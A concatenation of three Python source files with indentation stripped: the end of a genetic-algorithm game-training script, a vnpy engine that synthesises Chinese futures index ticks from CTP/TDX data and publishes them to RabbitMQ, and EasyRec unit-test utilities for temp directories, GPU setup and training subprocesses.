global players, bestPlayer, gen, pendingThread
threads = []
print('Train')
for i in range(0, len(players)) :
save(players[i].brain, "score\\" + str(i) + ".json")
players.clear()
p = ThreadPool(MAX_POPULATION)
p.map(launchGame, range(MAX_POPULATION))
maxScore = bestPlayer.score if bestPlayer != None else 0
for player in players :
if player.score > maxScore :
maxScore = player.score
bestPlayer = player
if bestPlayer != None :
save(bestPlayer.brain, "best.json")
if len(players) > 0 :
gen += 1
players = ga.nextGeneration(players)
def launchGame(i):
name = i
score = bestPlayer.score if bestPlayer != None else 0
p = game.main([
'mode=training',
'filename=score\\' + str(name)+'.json',
'speed=20',
'score=' + (str(score) if score > 2000 else '2000')
])
print(str(name) + ' : ' + str(p.score))
if __name__ == '__main__':
main(sys.argv)
|
engine.py | # encoding: UTF-8
# 通达信指数行情发布器
# 华富资产
import copy
import json
import traceback
from threading import Thread
from datetime import datetime, timedelta
from time import sleep
from logging import ERROR
from pytdx.exhq import TdxExHq_API
from copy import deepcopy
from vnpy.event import EventEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.object import TickData, SubscribeRequest
from vnpy.trader.utility import get_trading_date, get_underlying_symbol, load_json, get_real_symbol_by_exchange
from vnpy.data.tdx.tdx_common import TDX_FUTURE_HOSTS, get_future_contracts
from vnpy.component.base import (
NIGHT_MARKET_23,
NIGHT_MARKET_SQ2,
MARKET_DAY_ONLY)
from vnpy.amqp.producer import publisher
from vnpy.gateway.ctp.ctp_gateway import CtpMdApi, symbol_exchange_map
APP_NAME = 'Idx_Publisher'
class IndexTickPublisherV2(BaseEngine):
"""
指数tick发布服务
透过ctp 行情接口,获取所有合约,并根据合约的仓指,生成指数tick,发布至rabbitMQ
"""
# ----------------------------------------------------------------------
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(IndexTickPublisherV2, self).__init__(
main_engine, event_engine, APP_NAME)
self.main_engine = main_engine
self.event_engine = event_engine
self.create_logger(logger_name=APP_NAME)
self.gateway_name = 'CTP'
self.last_minute = None
self.registerEvent()
self.connection_status = False # 连接状态
# ctp md api
self.subscribed_symbols = set() # 已订阅合约代码
self.md_api = None # API 的连接会话对象
self.last_tick_dt = {} # 记录该会话对象的最后一个tick时间
self.instrument_count = 50000
self.has_qry_instrument = False
# vt_setting.json内rabbitmq配置项
self.conf = {}
self.pub = None
self.status = {}
self.subscribed_symbols = set() # 已订阅合约代码
self.ticks = {}
self.dt = datetime.now()
# 本地/vnpy/data/tdx/future_contracts.json
self.all_contracts = get_future_contracts()
# 需要订阅的短合约
self.selected_underly_symbols = load_json('subscribe_symbols.json', auto_save=False)
# 短合约 <=> 所有真实合约 的数量
self.underly_symbols_num_dict = {}
def write_error(self, content: str):
self.write_log(msg=content, level=ERROR)
def create_publisher(self, conf):
"""创建rabbitmq 消息发布器"""
if self.pub:
return
try:
self.write_log(f'创建发布器:{conf}')
# 消息发布
self.pub = publisher(host=conf.get('host', 'localhost'),
port=conf.get('port', 5672),
user=conf.get('user', 'admin'),
password=conf.get('password', 'admin'),
channel_number=conf.get('channel_number', 1),
queue_name=conf.get('queue_name', ''),
routing_key=conf.get('routing_key', 'default'),
exchange=conf.get('exchange', 'x_fanout_idx_tick'))
self.write_log(f'创建发布器成功')
except Exception as ex:
self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))
# ----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
"""定时执行"""
self.dt = datetime.now()
if self.last_minute and self.dt.minute == self.last_minute:
return
self.last_minute = self.dt.minute
self.check_status()
def check_status(self):
"""定期检查状态"""
if not self.md_api:
self.status.update({'con': False})
self.write_log(f'行情接口未连接')
return
dt_now = datetime.now()
# 扫描合约配置文件
for underly_symbol, info in self.all_contracts.items():
# 如果本地subscribe_symbols内有合约的指定订阅清单,进行排除 ['RB','IF']
if len(self.selected_underly_symbols) > 0 and underly_symbol not in self.selected_underly_symbols:
continue
# 日盘数据,夜盘期间不订阅
if dt_now.hour < 4 or dt_now.hour > 20:
if underly_symbol in MARKET_DAY_ONLY:
continue
# 获取当前所有的合约列表
symbols = info.get('symbols', {})
# 获取交易所
exchange = info.get('exchange', 'LOCAL')
# 获取本地记录的tick dict
tick_dict = self.ticks.get(underly_symbol, {})
for symbol in symbols.keys():
# 全路径合约 => 标准合约 ,如 ZC2109 => ZC109, RB2110 => rb2110
vn_symbol = get_real_symbol_by_exchange(symbol, Exchange(exchange))
if symbol.replace(underly_symbol, '') < dt_now.strftime('%Y%m%d'):
self.write_log(f'移除早于当月的合约{symbol}')
symbols.pop(symbol, None)
continue
# 生成带交易所信息的合约
vt_symbol = f'{vn_symbol}.{exchange}'
# symbol_exchange_map是全局变量,ctp md api会使用到,所以需要更新其 合约与交易所的关系
if vn_symbol not in symbol_exchange_map:
symbol_exchange_map.update({vn_symbol: Exchange(exchange)})
# 该合约没有在行情中,重新发出订阅
if vt_symbol not in tick_dict:
req = SubscribeRequest(
symbol=vn_symbol,
exchange=Exchange(exchange)
)
self.subscribe(req)
# 等级短合约 <=> 真实合约数量
self.underly_symbols_num_dict.update({underly_symbol: len(symbols.keys())})
def connect(self, *args, **kwargs):
"""
连接ctp行情,和rabbitmq推送
:param args:
:param kwargs:
:return:
"""
self.write_log(f'connect({kwargs}')
# 连接ctp行情服务器
md_address = kwargs.get('md_address')
userid = kwargs.get('userid')
password = kwargs.get('password')
brokerid = kwargs.get('brokerid')
if not self.md_api:
self.write_log(f'创建ctp行情服务器{md_address}')
self.md_api = CtpMdApi(gateway=self)
self.md_api.connect(address=md_address,
userid=userid,
password=password,
brokerid=brokerid)
# 连接rabbit MQ
rabbit_config = kwargs.get('rabbit_config', {})
self.write_log(f'创建rabbitMQ 消息推送桩,{rabbit_config}')
self.conf.update(rabbit_config)
self.create_publisher(self.conf)
def subscribe(self, req: SubscribeRequest):
"""订阅合约"""
self.write_log(f'engine:订阅合约: {req.vt_symbol}')
if req.vt_symbol not in self.subscribed_symbols:
self.subscribed_symbols.add(req.vt_symbol)
if self.md_api:
self.md_api.subscribe(req)
def on_tick(self, tick):
""" tick到达事件"""
# 排除tick时间与当前时间不一致tick
if abs((tick.datetime - self.dt).total_seconds()) > 20:
return
short_symbol = get_underlying_symbol(tick.symbol).upper()
# 更新tick
tick_dict = self.ticks.get(short_symbol, None)
if tick_dict is None:
tick_dict = {tick.symbol: tick}
self.ticks.update({short_symbol: tick_dict})
return
# 与最后
last_dt = self.last_tick_dt.get(short_symbol, tick.datetime)
# 进行指数合成
if last_dt and tick.datetime.second != last_dt.second:
all_amount = 0
all_interest = 0
all_volume = 0
all_ask1 = 0
all_bid1 = 0
last_price = 0
ask_price_1 = 0
bid_price_1 = 0
mi_tick = None
# 已经积累的行情tick数量,不足总数减1,不处理
n = self.underly_symbols_num_dict.get(short_symbol, 1)
if len(tick_dict) < min(n*0.8, 3) :
self.write_log(f'{short_symbol}合约数据{len(tick_dict)}不足{n} 0.8,暂不合成指数')
return
# 计算所有合约的累加持仓量、资金、成交量、找出最大持仓量的主力合约
for t in tick_dict.values():
all_interest += t.open_interest
all_amount += t.last_price * t.open_interest
all_volume += t.volume
all_ask1 += t.ask_price_1 * t.open_interest
all_bid1 += t.bid_price_1 * t.open_interest
if mi_tick is None or mi_tick.open_interest < t.open_interest:
mi_tick = t
# 总量 > 0
if all_interest > 0 and all_amount > 0:
last_price = round(float(all_amount / all_interest), 4)
# 卖1价
if all_ask1 > 0 and all_interest > 0:
ask_price_1 = round(float(all_ask1 / all_interest), 4)
# 买1价
if all_bid1 > 0 and all_interest > 0:
bid_price_1 = round(float(all_bid1 / all_interest), 4)
if mi_tick and last_price > 0:
if self.pub:
d = copy.copy(mi_tick.__dict__)
# 时间 =》 字符串
if isinstance(mi_tick.datetime, datetime):
d.update({'datetime': mi_tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
# 变量 => 字符串
d.update({'exchange': mi_tick.exchange.value})
d.update({'symbol': f'{short_symbol}99', 'vt_symbol': f'{short_symbol}99.{mi_tick.exchange.value}'})
# 更新未指数的持仓量、交易量,最后价格,ask1,bid1
d.update({'open_interest': all_interest, 'volume': all_volume,
'last_price': last_price, 'ask_price_1': ask_price_1, 'bid_price_1': bid_price_1})
#print('{} {}:{}'.format(d.get('datetime'), d.get("vt_symbol"), d.get('last_price')))
d = json.dumps(d)
self.pub.pub(d)
# 更新时间
self.last_tick_dt.update({short_symbol: tick.datetime})
tick_dict.update({tick.symbol: tick})
self.ticks.update({short_symbol: tick_dict})
def on_custom_tick(self, tick):
pass
class IndexTickPublisher(BaseEngine):
# 指数tick发布服务
# 通过通达信接口,获取指数行情tick,发布至rabbitMQ
# ----------------------------------------------------------------------
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(IndexTickPublisher, self).__init__(
main_engine, event_engine, APP_NAME)
self.main_engine = main_engine
self.event_engine = event_engine
self.create_logger(logger_name=APP_NAME)
self.last_minute = None
self.registerEvent()
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_tick_dict = {} # tdx合约与最后一个Tick得字典
# self.queue = Queue() # 请求队列
self.pool = None # 线程池
self.req_thread = None # 定时器线程
self.ip_list = TDX_FUTURE_HOSTS
# tdx api
self.fail_ip_dict = {} # 失效得API 的连接服务器配置: IP_port: 分钟倒数
self.best_ip = None
self.best_port = None
self.best_name = None
self.api = None # API 的连接会话对象
self.last_tick_dt = None # 记录该会话对象的最后一个tick时间
self.last_sort_speed_dt = None
self.instrument_count = 50000
self.has_qry_instrument = False
# vt_setting.json内rabbitmq配置项
self.conf = {}
self.pub = None
def write_error(self, content: str):
self.write_log(msg=content, level=ERROR)
def create_publisher(self, conf):
"""创建rabbitmq 消息发布器"""
if self.pub:
return
try:
# 消息发布
self.pub = publisher(host=conf.get('host', 'localhost'),
port=conf.get('port', 5672),
user=conf.get('user', 'admin'),
password=conf.get('password', 'admin'),
channel_number=conf.get('channel_number', 1),
queue_name=conf.get('queue_name', ''),
routing_key=conf.get('routing_key', 'default'),
exchange=conf.get('exchange', 'x_fanout_idx_tick'))
except Exception as ex:
self.write_log(u'创建tick发布器异常:{}'.format(str(ex)))
# ----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
"""定时执行"""
dt = datetime.now()
if dt.minute == self.last_minute:
return
# 更新失效IP地址得counter
for k in list(self.fail_ip_dict.keys()):
c = self.fail_ip_dict.get(k, 0)
if c <= 0:
self.fail_ip_dict.pop(k, None)
else:
c -= 1
self.fail_ip_dict.update({k: c})
self.check_status()
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = (datetime.now() - __time1).total_seconds() * 1000
self.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
return _timestamp
else:
self.write_log(u'该服务器IP {}无响应.'.format(ip))
return timedelta(seconds=10).total_seconds() * 1000
except Exception as ex:
self.write_error(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
return timedelta(seconds=10).total_seconds() * 1000
def sort_ip_speed(self):
"""
对所有服务器进行速度排序
:return:
"""
speed_result = []
for x in self.ip_list:
speed = self.ping(x['ip'], x['port'])
x.update({'speed': speed})
speed_result.append(copy.copy(x))
# 更新服务器,按照速度排序
self.ip_list = sorted(speed_result, key=lambda s: s['speed'])
self.write_log(u'服务器访问速度排序:{}'.format(self.ip_list))
# ----------------------------------------------------------------------
def select_best_ip(self):
"""
选择行情服务器
:return: IP地址, 端口, 服务器名称
"""
self.write_log(u'选择通达信行情服务器')
if self.last_sort_speed_dt is None or (datetime.now() - self.last_sort_speed_dt).total_seconds() > 60:
self.sort_ip_speed()
self.last_sort_speed_dt = datetime.now()
valid_ip_list = [x for x in self.ip_list if x.get('speed', 10000) < 10000]
if len(valid_ip_list) == 0:
self.write_error(u'未能找到合适速度得行情服务器')
return None, None, None
for server in valid_ip_list:
ip = server.get('ip')
port = server.get('port')
name = server.get('name', '{}:{}'.format(ip, port))
if '{}:{}'.format(ip, port) in self.fail_ip_dict:
self.write_log(u'{}:{}属于上次异常IP地址,忽略'.format(ip, port))
continue
return ip, port, name
return None, None, None
def connect(self, rabbit_config: dict):
"""
连接通达讯行情服务器
:param n:
:return:
"""
if self.connection_status:
if self.api is not None or getattr(self.api, "client", None) is not None:
self.write_log(u'当前已经连接,不需要重新连接')
return
self.write_log(u'开始通达信行情服务器')
try:
self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
# 选取最佳服务器
self.best_ip, self.best_port, self.best_name = self.select_best_ip()
if self.best_ip is None or self.best_port is None:
self.write_error(u'未能选择到服务器')
self.write_log(u'api 选择 {}: {}:{}'.format(self.best_name, self.best_ip, self.best_port))
self.api.connect(self.best_ip, self.best_port)
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.write_error(err_msg)
else:
self.write_log(u'创建tdx连接')
self.last_tick_dt = datetime.now()
self.connection_status = True
self.instrument_count = c
except Exception as ex:
self.write_error(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
return
# 更新 symbol_exchange_dict , symbol_market_dict
self.write_log(u'查询合约')
self.qry_instrument()
self.conf.update(rabbit_config)
self.create_publisher(self.conf)
self.req_thread = Thread(target=self.run)
self.req_thread.start()
def reconnect(self):
"""
重连
:return:
"""
try:
self.best_ip, self.best_port, self.best_name = self.select_best_ip()
self.api = TdxExHq_API(heartbeat=True, auto_retry=True)
self.api.connect(self.best_ip, self.best_port)
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip, self.best_port)
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.write_error(err_msg)
else:
self.write_log(u'重新创建tdx连接')
sleep(1)
except Exception as ex:
self.write_error(u'重新连接服务器异常:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
return
def close(self):
"""退出API"""
self.write_log(u'退出tdx API')
self.connection_status = False
if self.req_thread is not None:
self.write_log(u'退出请求线程')
self.req_thread.join()
if self.pub:
self.write_log(u'退出rabbitMQ 发布器')
self.pub.exit()
def check_status(self):
self.write_log(u'检查tdx接口状态')
if len(self.symbol_tick_dict) > 0:
k = self.symbol_tick_dict.keys()[0]
tick = self.symbol_tick_dict.get(k, None)
if tick:
self.write_log(f'{tick.vt_symbol}: {tick.datetime}, price:{tick.last_price}')
else:
self.write_log(f'目前没有收到tick')
# 若还没有启动连接,就启动连接
over_time = self.last_tick_dt is None or (datetime.now() - self.last_tick_dt).total_seconds() > 60
if not self.connection_status or self.api is None or over_time:
self.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
self.api = None
self.reconnect()
else:
self.write_log(u'tdx接口状态正常')
def qry_instrument(self):
"""
查询/更新合约信息
:return:
"""
if not self.connection_status:
self.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
return
if self.has_qry_instrument:
self.write_error(u'已经查询过一次合约信息,不再查询')
return
# 取得所有的合约信息
num = self.api.get_instrument_count()
if not isinstance(num, int):
return
all_contacts = sum(
[self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
# [{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]
# 对所有合约处理,更新字典 指数合约-tdx市场,指数合约-交易所
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
continue
tdx_market_id = tdx_contract.get('market')
self.symbol_market_dict[tdx_symbol] = tdx_market_id
if tdx_market_id == 47: # 中金所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
elif tdx_market_id == 28: # 郑商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
elif tdx_market_id == 29: # 大商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
elif tdx_market_id == 30: # 上期所+能源
self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
elif tdx_market_id == 60: # 主力合约
self.write_log(u'主力合约:{}'.format(tdx_contract))
self.has_qry_instrument = True
def run(self):
# 版本3 :直接查询板块
try:
last_dt = datetime.now()
self.write_log(u'开始运行tdx,{}'.format(last_dt))
while self.connection_status:
try:
self.process_index_req()
except BrokenPipeError as bex:
self.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.reconnect()
sleep(5)
break
except Exception as ex:
self.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
self.fail_ip_dict.update({'{}:{}'.format(self.best_ip, self.best_port): 10})
self.reconnect()
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.write_log('tdxcheck point. {},last_tick_dt:{}'.format(dt, self.last_tick_dt))
last_dt = dt
except Exception as ex:
self.write_error(u'tdx pool.run exception:{},{}'.format(str(ex), traceback.format_exc()))
self.write_error(u'tdx 线程 {}退出'.format(datetime.now()))
def process_index_req(self):
"""处理板块获取指数行情tick"""
# 获取通达信指数板块所有行情
rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
if rt_list is None or len(rt_list) == 0:
self.write_log(u'tdx:get_instrument_quote_list() rt_list为空')
return
# 记录该接口的行情最后更新时间
self.last_tick_dt = datetime.now()
for d in list(rt_list):
tdx_symbol = d.get('code', None)
if tdx_symbol.endswith('L9'):
vn_symbol = tdx_symbol.replace('L9', '99').upper()
else:
vn_symbol = tdx_symbol.upper()
tick_datetime = datetime.now()
# 修正毫秒
last_tick = self.symbol_tick_dict.get(vn_symbol, None)
if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
# 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
tick_datetime = tick_datetime.replace(microsecond=500)
else:
tick_datetime = tick_datetime.replace(microsecond=0)
# 通达信上能源的交易所为上期所,需要改正过来
if vn_symbol in ['NR99', 'SC99']:
exchange = Exchange.INE
else:
exchange = self.symbol_exchange_dict.get(tdx_symbol, Exchange.LOCAL)
tick = TickData(
gateway_name='tdx',
symbol=vn_symbol,
datetime=tick_datetime,
exchange=exchange
)
tick.pre_close = float(d.get('ZuoJie', 0.0))
tick.high_price = float(d.get('ZuiGao', 0.0))
tick.open_price = float(d.get('JinKai', 0.0))
tick.low_price = float(d.get('ZuiDi', 0.0))
tick.last_price = float(d.get('MaiChu', 0.0))
tick.volume = int(d.get('XianLiang', 0))
tick.open_interest = d.get('ChiCangLiang')
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = get_trading_date(tick_datetime)
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
# CTP只有一档行情
tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
underlying_symbol = vn_symbol.replace('99', '').upper()
# 排除非交易时间得tick
if tick.exchange is Exchange.CFFEX:
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
continue
if tick.datetime.hour == 9 and tick.datetime.minute < 15:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
continue
if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
continue
else: # 大商所/郑商所,上期所,上海能源
# 排除非开盘小时
if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
continue
# 排除早盘 10:15~10:30
if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
# 排除午盘 13:00 ~13:30
if tick.datetime.hour == 13 and tick.datetime.minute < 30:
continue
# 排除凌晨2:30~3:00
if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
continue
# 排除大商所/郑商所/上期所夜盘数据上期所夜盘数据 23:00 收盘
if underlying_symbol in NIGHT_MARKET_23:
if tick.datetime.hour in [23, 0, 1, 2]:
continue
# 排除上期所夜盘数据 1:00 收盘
if underlying_symbol in NIGHT_MARKET_SQ2:
if tick.datetime.hour in [1, 2]:
continue
# 排除日盘合约在夜盘得数据
if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
# self.write_log(u'排除日盘合约{}在夜盘得数据'.format(short_symbol))
continue
self.symbol_tick_dict[tick.symbol] = tick
if self.pub:
d = copy.copy(tick.__dict__)
if isinstance(tick.datetime, datetime):
d.update({'datetime': tick.datetime.strftime('%Y-%m-%d %H:%M:%S.%f')})
d.update({'exchange': tick.exchange.value})
d = json.dumps(d)
self.pub.pub(d)
|
test_utils.py | # -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
"""Contains functions which are convenient for unit testing.
isort:skip_file
"""
from future import standard_library
standard_library.install_aliases()
import yaml
import glob
import json
import logging
import os
import random
import shutil
import string
import subprocess
import time
from multiprocessing import Process
from subprocess import getstatusoutput
from tensorflow.python.platform import gfile
import numpy as np
from easy_rec.python.protos.train_pb2 import DistributionStrategy
from easy_rec.python.utils import config_util
from easy_rec.python.protos.pipeline_pb2 import EasyRecConfig
TEST_DIR = './tmp/easy_rec_test'
def get_hdfs_tmp_dir(test_dir):
"""Create a randomly of directory in HDFS."""
tmp_name = ''.join(
[random.choice(string.ascii_letters + string.digits) for i in range(8)])
assert isinstance(test_dir, str)
test_rand_dir = os.path.join(test_dir, tmp_name)
gfile.MkDir(test_rand_dir)
return test_rand_dir
def get_tmp_dir():
tmp_name = ''.join(
[random.choice(string.ascii_letters + string.digits) for i in range(8)])
if os.environ.get('TEST_DIR', '') != '':
global TEST_DIR
TEST_DIR = os.environ['TEST_DIR']
dir_name = os.path.join(TEST_DIR, tmp_name)
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
return dir_name
def clear_all_tmp_dirs():
shutil.rmtree(TEST_DIR)
def set_gpu_id(gpu_id_str):
env = os.environ
if gpu_id_str is None:
env['CUDA_VISIBLE_DEVICES'] = ''
else:
env['CUDA_VISIBLE_DEVICES'] = gpu_id_str
def get_available_gpus():
if 'TEST_DEVICES' in os.environ:
gpus = os.environ['TEST_DEVICES'].split(',')
else:
gpus = glob.glob('/dev/nvidia[0-9]*')
gpus = [gpu.replace('/dev/nvidia', '') for gpu in gpus]
logging.info('available gpus %s' % gpus)
return gpus
def run_cmd(cmd_str, log_file):
"""Run a shell cmd."""
cmd_str = cmd_str.replace('\r', ' ').replace('\n', ' ')
logging.info('RUNCMD: %s > %s 2>&1 ' % (cmd_str, log_file))
with open(log_file, 'w') as lfile:
return subprocess.Popen(
cmd_str, stdout=lfile, stderr=subprocess.STDOUT, shell=True)
def RunAsSubprocess(f):
"""Function dectorator to run function in subprocess.
if a function will start a tf session. Because tensorflow gpu memory will not be cleared until the
process exit.
"""
def wrapped_f(*args, **kw):
p = Process(target=f, args=args, kwargs=kw)
p.start()
p.join(timeout=600)
assert p.exitcode == 0, 'subprocess run failed: %s' % f.__name__
return wrapped_f
def clean_up(test_dir):
if test_dir is not None:
shutil.rmtree(test_dir)
# reset to cpu mode
set_gpu_id(None)
def clean_up_hdfs(test_dir):
if gfile.Exists(test_dir):
gfile.DeleteRecursively(test_dir)
set_gpu_id(None)
def _replace_data_for_test(data_path):
"""Replace real data with test data."""
test_data = {}
change = False
releated_datasets = []
for k, config in test_data.items():
if k in data_path:
releated_datasets.append(k)
# if there are multiple keyword detected, use the longest one
if len(releated_datasets) > 0:
score = [len(k) for k in releated_datasets]
best_match = np.argmax(score)
data_path = test_data[releated_datasets[best_match]]
change = True
assert change, 'Failed to replace data with test data'
return data_path
def _load_config_for_test(pipeline_config_path, test_dir, total_steps=50):
pipeline_config = config_util.get_configs_from_pipeline_file(
pipeline_config_path)
train_config = pipeline_config.train_config
eval_config = pipeline_config.eval_config
data_config = pipeline_config.data_config
train_config.num_steps = total_steps
# change model_dir
pipeline_config.model_dir = test_dir + '/train'
logging.info('test_model_dir %s' % pipeline_config.model_dir)
eval_config.num_examples = max(10, data_config.batch_size)
data_config.num_epochs = 0
return pipeline_config
def test_datahub_train_eval(pipeline_config_path,
test_dir,
process_pipeline_func=None,
hyperparam_str='',
total_steps=50,
post_check_func=None):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
if not isinstance(pipeline_config_path, EasyRecConfig):
logging.info('testing pipeline config %s' % pipeline_config_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
if isinstance(pipeline_config_path, EasyRecConfig):
pipeline_config = pipeline_config_path
else:
pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
total_steps)
pipeline_config.train_config.train_distribute = 0
pipeline_config.train_config.num_gpus_per_worker = 1
pipeline_config.train_config.sync_replicas = False
if process_pipeline_func is not None:
assert callable(process_pipeline_func)
pipeline_config = process_pipeline_func(pipeline_config)
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
train_cmd = 'python3 -m easy_rec.python.train_eval --pipeline_config_path %s %s' % (
test_pipeline_config_path, hyperparam_str)
proc = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
proc.wait()
if proc.returncode != 0:
logging.error('train %s failed' % test_pipeline_config_path)
return False
if post_check_func:
return post_check_func(pipeline_config)
return True
def _Load_config_for_test_eval(pipeline_config_path):
pipeline_config = config_util.get_configs_from_pipeline_file(
pipeline_config_path)
return pipeline_config
def test_single_train_eval(pipeline_config_path,
test_dir,
process_pipeline_func=None,
hyperparam_str='',
total_steps=50,
post_check_func=None,
check_mode=False):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
if not isinstance(pipeline_config_path, EasyRecConfig):
logging.info('testing pipeline config %s' % pipeline_config_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
if isinstance(pipeline_config_path, EasyRecConfig):
pipeline_config = pipeline_config_path
else:
pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
total_steps)
pipeline_config.train_config.train_distribute = 0
pipeline_config.train_config.num_gpus_per_worker = 1
pipeline_config.train_config.sync_replicas = False
if process_pipeline_func is not None:
assert callable(process_pipeline_func)
pipeline_config = process_pipeline_func(pipeline_config)
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
train_cmd = 'python -m easy_rec.python.train_eval --pipeline_config_path %s %s' % (
test_pipeline_config_path, hyperparam_str)
if check_mode:
train_cmd += '--check_mode'
proc = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
proc.wait()
if proc.returncode != 0:
logging.error('train %s failed' % test_pipeline_config_path)
return False
if post_check_func:
return post_check_func(pipeline_config)
return True
def test_single_pre_check(pipeline_config_path, test_dir):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
if not isinstance(pipeline_config_path, EasyRecConfig):
logging.info('testing pipeline config %s' % pipeline_config_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
if isinstance(pipeline_config_path, EasyRecConfig):
pipeline_config = pipeline_config_path
else:
pipeline_config = _load_config_for_test(pipeline_config_path, test_dir)
pipeline_config.train_config.train_distribute = 0
pipeline_config.train_config.num_gpus_per_worker = 1
pipeline_config.train_config.sync_replicas = False
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
train_cmd = 'python -m easy_rec.python.tools.pre_check --pipeline_config_path %s ' % (
test_pipeline_config_path)
proc = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'master'))
proc.wait()
if proc.returncode != 0:
logging.error('train %s failed' % test_pipeline_config_path)
return False
return True
def test_feature_selection(pipeline_config):
model_dir = pipeline_config.model_dir
pipeline_config_path = os.path.join(model_dir, 'pipeline.config')
output_dir = os.path.join(model_dir, 'feature_selection')
cmd = 'python -m easy_rec.python.tools.feature_selection --config_path %s ' \
'--output_dir %s --topk 5 --visualize true' % (pipeline_config_path, output_dir)
proc = run_cmd(cmd, os.path.join(model_dir, 'log_feature_selection.txt'))
proc.wait()
if proc.returncode != 0:
logging.error('feature selection %s failed' % pipeline_config_path)
return False
return True
def yaml_replace(train_yaml_path,
pipline_config_path,
test_pipeline_config_path,
test_export_dir=None):
